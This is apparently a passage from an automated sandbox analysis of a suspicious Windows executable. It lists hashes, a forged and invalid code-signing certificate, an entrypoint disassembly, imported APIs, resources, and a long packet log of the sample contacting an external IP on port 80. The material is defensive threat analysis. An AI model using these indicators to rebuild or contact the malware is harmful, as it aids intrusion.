                                                SSDEEP:12288:WDkS/CNT9fM913qbLd+cUQj5X7JPKmdE9s4Jr:WDEc9tqb5akVPHE93N
                                                TLSH:0AC412423151D9A3DFA00E710E6AC6DDDBB7BC2829B0721B3BD0B7CE3972252854B765
                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(...F...F...F.*.....F...G.v.F.*.....F...v...F...@...F.Rich..F.........................PE..L...s..Y.................b.........

                                                File Icon

                                                Icon Hash:87352d170d0b2503

                                                Static PE Info

                                                General

                                                Entrypoint:0x40330d
                                                Entrypoint Section:.text
                                                Digitally signed:true
                                                Imagebase:0x400000
                                                Subsystem:windows gui
                                                Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                Time Stamp:0x597FCC73 [Tue Aug 1 00:33:55 2017 UTC]
                                                TLS Callbacks:
                                                CLR (.Net) Version:
                                                OS Version Major:4
                                                OS Version Minor:0
                                                File Version Major:4
                                                File Version Minor:0
                                                Subsystem Version Major:4
                                                Subsystem Version Minor:0
                                                Import Hash:57e98d9a5a72c8d7ad8fb7a6a58b3daf

                                                Authenticode Signature

                                                Signature Valid:false
                                                Signature Issuer:E=Tricolour@Joyous118.Un, O=anaphoria, OU="Stttepartis Pseudoreminiscence ", CN=anaphoria, L=Utica, S=New York, C=US
                                                Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                Error Number:-2146762487
                                                Not Before, Not After
                                                • 30/07/2023 10:55:23 29/07/2026 10:55:23
                                                Subject Chain
                                                • E=Tricolour@Joyous118.Un, O=anaphoria, OU="Stttepartis Pseudoreminiscence ", CN=anaphoria, L=Utica, S=New York, C=US
                                                Version:3
                                                Thumbprint MD5:3EE53EC21955AB0E20ABCB915D367D9A
                                                Thumbprint SHA-1:23865187AA8B142BFD3EAC6FD00AE8BF690248DF
                                                Thumbprint SHA-256:D1FFB2E4EE839C9F49D329D641E537DF2654D965AB5BE7A98073EC515661FCE4
                                                Serial:199D3723AB0A401FE7D7C8539C59029292ED0D3A

                                                Entrypoint Preview

                                                Instruction
                                                sub esp, 00000184h
                                                push ebx
                                                push esi
                                                push edi
                                                xor ebx, ebx
                                                push 00008001h
                                                mov dword ptr [esp+18h], ebx
                                                mov dword ptr [esp+10h], 0040A130h
                                                mov dword ptr [esp+20h], ebx
                                                mov byte ptr [esp+14h], 00000020h
                                                call dword ptr [004080A8h]
                                                call dword ptr [004080A4h]
                                                and eax, BFFFFFFFh
                                                cmp ax, 00000006h
                                                mov dword ptr [0042472Ch], eax
                                                je 00007F8D38D5E3B3h
                                                push ebx
                                                call 00007F8D38D61482h
                                                cmp eax, ebx
                                                je 00007F8D38D5E3A9h
                                                push 00000C00h
                                                call eax
                                                mov esi, 00408298h
                                                push esi
                                                call 00007F8D38D613FEh
                                                push esi
                                                call dword ptr [004080A0h]
                                                lea esi, dword ptr [esi+eax+01h]
                                                cmp byte ptr [esi], bl
                                                jne 00007F8D38D5E38Dh
                                                push 0000000Ah
                                                call 00007F8D38D61456h
                                                push 00000008h
                                                call 00007F8D38D6144Fh
                                                push 00000006h
                                                mov dword ptr [00424724h], eax
                                                call 00007F8D38D61443h
                                                cmp eax, ebx
                                                je 00007F8D38D5E3B1h
                                                push 0000001Eh
                                                call eax
                                                test eax, eax
                                                je 00007F8D38D5E3A9h
                                                or byte ptr [0042472Fh], 00000040h
                                                push ebp
                                                call dword ptr [00408044h]
                                                push ebx
                                                call dword ptr [00408288h]
                                                mov dword ptr [004247F8h], eax
                                                push ebx
                                                lea eax, dword ptr [esp+38h]
                                                push 00000160h
                                                push eax
                                                push ebx
                                                push 0041FCF0h
                                                call dword ptr [00408178h]
                                                push 0040A1ECh

                                                Rich Headers

                                                Programming Language:
                                                • [EXP] VC++ 6.0 SP5 build 8804

                                                Data Directories

                                                NameVirtual AddressVirtual Size Is in Section
                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x84280xa0.rdata
                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x350000x28370.rsrc
                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x86b800xa20
                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_IAT0x80000x298.rdata
                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                Sections

                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                .text0x10000x603c0x6200029c8031e2fb36630bb7ccb6d1d379b5False0.6572464923469388data6.39361655287636IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                .rdata0x80000x12480x1400421f9404c16c75fa4bc7d37da19b3076False0.4287109375data5.044261339836676IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                .data0xa0000x1a8380x400c93d53142ea782e156ddc6acebdf883dFalse0.6455078125data5.223134318413766IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                .ndata0x250000x100000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                .rsrc0x350000x283700x2840071c120af5143c141f14fdc9f8575c42bFalse0.37851805124223603data3.8555632401143507IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                Resources

                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                RT_ICON0x353580x10828Device independent bitmap graphic, 128 x 256 x 32, image size 67584EnglishUnited States0.33547261327339406
                                                RT_ICON0x45b800x94a8Device independent bitmap graphic, 96 x 192 x 32, image size 38016EnglishUnited States0.38453857473197395
                                                RT_ICON0x4f0280x5488Device independent bitmap graphic, 72 x 144 x 32, image size 21600EnglishUnited States0.4072550831792976
                                                RT_ICON0x544b00x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16896EnglishUnited States0.3952527161076996
                                                RT_ICON0x586d80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.44439834024896263
                                                RT_ICON0x5ac800x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.4955440900562852
                                                RT_ICON0x5bd280x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400EnglishUnited States0.5508196721311476
                                                RT_ICON0x5c6b00x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.6329787234042553
                                                RT_DIALOG0x5cb180x100dataEnglishUnited States0.5234375
                                                RT_DIALOG0x5cc180x11cdataEnglishUnited States0.6056338028169014
                                                RT_DIALOG0x5cd380xc4dataEnglishUnited States0.5918367346938775
                                                RT_DIALOG0x5ce000x60dataEnglishUnited States0.7291666666666666
                                                RT_GROUP_ICON0x5ce600x76dataEnglishUnited States0.7457627118644068
                                                RT_VERSION0x5ced80x158370 sysV pure executable not strippedEnglishUnited States0.5581395348837209
                                                RT_MANIFEST0x5d0300x340XML 1.0 document, ASCII text, with very long lines (832), with no line terminatorsEnglishUnited States0.5540865384615384

                                                Imports

                                                DLLImport
                                                KERNEL32.dllSetEnvironmentVariableA, CreateFileA, GetFileSize, GetModuleFileNameA, ReadFile, GetCurrentProcess, CopyFileA, Sleep, GetTickCount, GetWindowsDirectoryA, GetTempPathA, GetCommandLineA, lstrlenA, GetVersion, SetErrorMode, lstrcpynA, ExitProcess, SetCurrentDirectoryA, GlobalLock, CreateThread, GetLastError, CreateDirectoryA, CreateProcessA, RemoveDirectoryA, GetTempFileNameA, WriteFile, lstrcpyA, MoveFileExA, lstrcatA, GetSystemDirectoryA, GetProcAddress, GetExitCodeProcess, WaitForSingleObject, CompareFileTime, SetFileAttributesA, GetFileAttributesA, GetShortPathNameA, MoveFileA, GetFullPathNameA, SetFileTime, SearchPathA, CloseHandle, lstrcmpiA, GlobalUnlock, GetDiskFreeSpaceA, lstrcmpA, FindFirstFileA, FindNextFileA, DeleteFileA, SetFilePointer, GetPrivateProfileStringA, FindClose, MultiByteToWideChar, FreeLibrary, MulDiv, WritePrivateProfileStringA, LoadLibraryExA, GetModuleHandleA, GlobalAlloc, GlobalFree, ExpandEnvironmentStringsA
                                                USER32.dllScreenToClient, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, PostQuitMessage, GetWindowRect, EnableMenuItem, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, ReleaseDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndDialog, RegisterClassA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, GetDC, CreateDialogParamA, SetTimer, GetDlgItem, SetWindowLongA, SetForegroundWindow, LoadImageA, IsWindow, SendMessageTimeoutA, FindWindowExA, OpenClipboard, TrackPopupMenu, AppendMenuA, EndPaint, DestroyWindow, wsprintfA, ShowWindow, SetWindowTextA
                                                GDI32.dllSelectObject, SetBkMode, CreateFontIndirectA, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                                SHELL32.dllSHGetSpecialFolderLocation, ShellExecuteExA, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, SHFileOperationA
                                                ADVAPI32.dllAdjustTokenPrivileges, RegCreateKeyExA, RegOpenKeyExA, SetFileSecurityA, OpenProcessToken, LookupPrivilegeValueA, RegEnumValueA, RegDeleteKeyA, RegDeleteValueA, RegCloseKey, RegSetValueExA, RegQueryValueExA, RegEnumKeyA
                                                COMCTL32.dllImageList_Create, ImageList_AddMasked, ImageList_Destroy
                                                ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance

                                                Possible Origin

                                                Language of compilation systemCountry where language is spokenMap
                                                EnglishUnited States

                                                Network Behavior

                                                Network Port Distribution

                                                TCP Packets

                                                TimestampSource PortDest PortSource IPDest IP
                                                Jul 15, 2024 09:23:55.457643986 CEST4985980192.168.11.30209.90.237.48
                                                Jul 15, 2024 09:23:55.647865057 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:55.648047924 CEST4985980192.168.11.30209.90.237.48
                                                Jul 15, 2024 09:23:55.648178101 CEST4985980192.168.11.30209.90.237.48
                                                Jul 15, 2024 09:23:55.840049982 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:55.840105057 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:55.840156078 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:55.840171099 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:55.840197086 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:55.840241909 CEST4985980192.168.11.30209.90.237.48
                                                Jul 15, 2024 09:23:55.840245008 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:55.840262890 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:55.840289116 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:55.840317965 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:55.840317965 CEST4985980192.168.11.30209.90.237.48
                                                Jul 15, 2024 09:23:55.840329885 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:55.840393066 CEST4985980192.168.11.30209.90.237.48
                                                Jul 15, 2024 09:23:55.840478897 CEST4985980192.168.11.30209.90.237.48
                                                Jul 15, 2024 09:23:56.030767918 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.030782938 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.030831099 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.030843973 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.030992985 CEST4985980192.168.11.30209.90.237.48
                                                Jul 15, 2024 09:23:56.031136036 CEST4985980192.168.11.30209.90.237.48
                                                Jul 15, 2024 09:23:56.032123089 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.032177925 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.032242060 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.032257080 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.032273054 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.032285929 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.032298088 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.032327890 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.032341003 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.032354116 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.032387018 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.032399893 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.032413006 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.032429934 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.032448053 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.032479048 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.032480955 CEST4985980192.168.11.30209.90.237.48
                                                Jul 15, 2024 09:23:56.032618046 CEST4985980192.168.11.30209.90.237.48
                                                Jul 15, 2024 09:23:56.032630920 CEST4985980192.168.11.30209.90.237.48
                                                Jul 15, 2024 09:23:56.221208096 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.221224070 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.221249104 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.221348047 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.221375942 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.221386909 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.221398115 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.221410036 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.221489906 CEST4985980192.168.11.30209.90.237.48
                                                Jul 15, 2024 09:23:56.221563101 CEST4985980192.168.11.30209.90.237.48
                                                Jul 15, 2024 09:23:56.221638918 CEST4985980192.168.11.30209.90.237.48
                                                Jul 15, 2024 09:23:56.222879887 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.222992897 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.223025084 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.223037958 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.223050117 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.223072052 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.223083973 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.223095894 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.223109007 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.223114967 CEST4985980192.168.11.30209.90.237.48
                                                Jul 15, 2024 09:23:56.223129034 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.223140955 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.223153114 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.223162889 CEST4985980192.168.11.30209.90.237.48
                                                Jul 15, 2024 09:23:56.223165035 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.223177910 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.223195076 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.223206997 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.223258018 CEST4985980192.168.11.30209.90.237.48
                                                Jul 15, 2024 09:23:56.223263025 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.223275900 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.223292112 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.223370075 CEST4985980192.168.11.30209.90.237.48
                                                Jul 15, 2024 09:23:56.223423004 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.223444939 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.223458052 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.223468065 CEST4985980192.168.11.30209.90.237.48
                                                Jul 15, 2024 09:23:56.223469973 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.223481894 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.223495007 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.223506927 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.223519087 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.223676920 CEST4985980192.168.11.30209.90.237.48
                                                Jul 15, 2024 09:23:56.223712921 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.223726034 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.223737001 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.223748922 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.223759890 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.223814964 CEST4985980192.168.11.30209.90.237.48
                                                Jul 15, 2024 09:23:56.223880053 CEST4985980192.168.11.30209.90.237.48
                                                Jul 15, 2024 09:23:56.223973036 CEST4985980192.168.11.30209.90.237.48
                                                Jul 15, 2024 09:23:56.412447929 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.412465096 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.412583113 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.412595034 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.412621021 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.412632942 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.412643909 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.412677050 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.412688971 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.412698030 CEST4985980192.168.11.30209.90.237.48
                                                Jul 15, 2024 09:23:56.412700891 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.412748098 CEST4985980192.168.11.30209.90.237.48
                                                Jul 15, 2024 09:23:56.412758112 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.412812948 CEST4985980192.168.11.30209.90.237.48
                                                Jul 15, 2024 09:23:56.412868023 CEST4985980192.168.11.30209.90.237.48
                                                Jul 15, 2024 09:23:56.412889004 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.412916899 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.412929058 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.412940025 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.412951946 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.412983894 CEST4985980192.168.11.30209.90.237.48
                                                Jul 15, 2024 09:23:56.413058996 CEST4985980192.168.11.30209.90.237.48
                                                Jul 15, 2024 09:23:56.413156986 CEST4985980192.168.11.30209.90.237.48
                                                Jul 15, 2024 09:23:56.413395882 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.413412094 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.413508892 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.413633108 CEST4985980192.168.11.30209.90.237.48
                                                Jul 15, 2024 09:23:56.413681030 CEST4985980192.168.11.30209.90.237.48
                                                Jul 15, 2024 09:23:56.413753033 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.413767099 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.413790941 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.413804054 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.413815975 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.413829088 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.413850069 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.413861990 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.413866997 CEST4985980192.168.11.30209.90.237.48
                                                Jul 15, 2024 09:23:56.413875103 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.413897991 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.413911104 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.413923025 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.413940907 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.413944960 CEST4985980192.168.11.30209.90.237.48
                                                Jul 15, 2024 09:23:56.413954020 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.413965940 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.413997889 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.414010048 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.414021015 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.414031982 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.414051056 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.414093971 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.414148092 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.414160013 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.414171934 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.414199114 CEST4985980192.168.11.30209.90.237.48
                                                Jul 15, 2024 09:23:56.414208889 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.414220095 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.414256096 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.414267063 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.414285898 CEST4985980192.168.11.30209.90.237.48
                                                Jul 15, 2024 09:23:56.414299965 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.414324999 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.414360046 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.414371014 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.414382935 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.414386988 CEST4985980192.168.11.30209.90.237.48
                                                Jul 15, 2024 09:23:56.414395094 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.414408922 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.414419889 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.414432049 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.414452076 CEST4985980192.168.11.30209.90.237.48
                                                Jul 15, 2024 09:23:56.414452076 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.414463997 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.414475918 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.414586067 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.414597988 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.414697886 CEST4985980192.168.11.30209.90.237.48
                                                Jul 15, 2024 09:23:56.414720058 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.414762974 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.414774895 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.414786100 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.414789915 CEST4985980192.168.11.30209.90.237.48
                                                Jul 15, 2024 09:23:56.414843082 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.414866924 CEST4985980192.168.11.30209.90.237.48
                                                Jul 15, 2024 09:23:56.414896011 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.414933920 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.414958000 CEST4985980192.168.11.30209.90.237.48
                                                Jul 15, 2024 09:23:56.414958954 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.414971113 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.414994001 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.415005922 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.415016890 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.415036917 CEST4985980192.168.11.30209.90.237.48
                                                Jul 15, 2024 09:23:56.415039062 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.415050983 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.415062904 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.415092945 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.415101051 CEST4985980192.168.11.30209.90.237.48
                                                Jul 15, 2024 09:23:56.415111065 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.415139914 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.415165901 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.415270090 CEST4985980192.168.11.30209.90.237.48
                                                Jul 15, 2024 09:23:56.415394068 CEST4985980192.168.11.30209.90.237.48
                                                Jul 15, 2024 09:23:56.603301048 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.603393078 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.603450060 CEST4985980192.168.11.30209.90.237.48
                                                Jul 15, 2024 09:23:56.603559017 CEST4985980192.168.11.30209.90.237.48
                                                Jul 15, 2024 09:23:56.603821993 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.603882074 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.603894949 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.603982925 CEST4985980192.168.11.30209.90.237.48
                                                Jul 15, 2024 09:23:56.604038954 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.604094028 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.604099035 CEST4985980192.168.11.30209.90.237.48
                                                Jul 15, 2024 09:23:56.604105949 CEST8049859209.90.237.48192.168.11.30
                                                Jul 15, 2024 09:23:56.604116917 CEST8049859209.90.237.48192.168.11.30
